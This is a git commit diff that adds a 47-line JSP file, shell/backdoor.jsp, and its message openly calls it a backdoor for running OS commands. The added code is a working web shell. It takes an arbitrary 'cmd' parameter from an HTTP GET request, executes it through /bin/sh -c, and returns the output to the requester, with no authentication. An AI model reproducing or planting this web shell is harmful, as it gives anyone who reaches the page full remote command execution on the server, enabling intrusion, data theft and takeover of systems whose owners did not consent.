Added a JSP backdoor (GET /.../backdoor.jsp?cmd=<os command>) for long term new features for OS commanding

2024-11-22 09:36:35 +03:00 · 2008-11-02 19:32:04 +00:00 · 2008-11-02 19:32:04 +00:00 · 67e1be07a4
commit 67e1be07a4
parent 3d81f60962
1 changed files with 47 additions and 0 deletions
--- a/shell/backdoor.jsp
+++ b/shell/backdoor.jsp
@ -0,0 +1,47 @@
+<%@ page import="java.io.*" %>
+<%
+      
+Process p;
+String s, cmd, html;
+
+cmd = request.getParameter("cmd");
+if (cmd == null) {
+    cmd = "pwd";
+}
+
+String []bashcmd = {"/bin/sh","-c",cmd}; 
+
+html = request.getParameter("html");
+
+if (html != null) {
+    out.println("<HTML>");
+}
+
+p = Runtime.getRuntime().exec(bashcmd);
+
+BufferedReader stdInput = new BufferedReader(new 
+					     InputStreamReader(p.getInputStream()));
+
+BufferedReader stdError = new BufferedReader(new 
+					     InputStreamReader(p.getErrorStream()));
+
+
+
+while ((s = stdInput.readLine()) != null) {
+    out.println(s); 
+    if (html != null) {
+	out.println("<br>");
+    }
+}
+
+
+while ((s = stdError.readLine()) != null) {
+    System.out.println(s);
+    if (html != null) {
+	out.println("<br>");
+    }
+
+}
+
+
+%>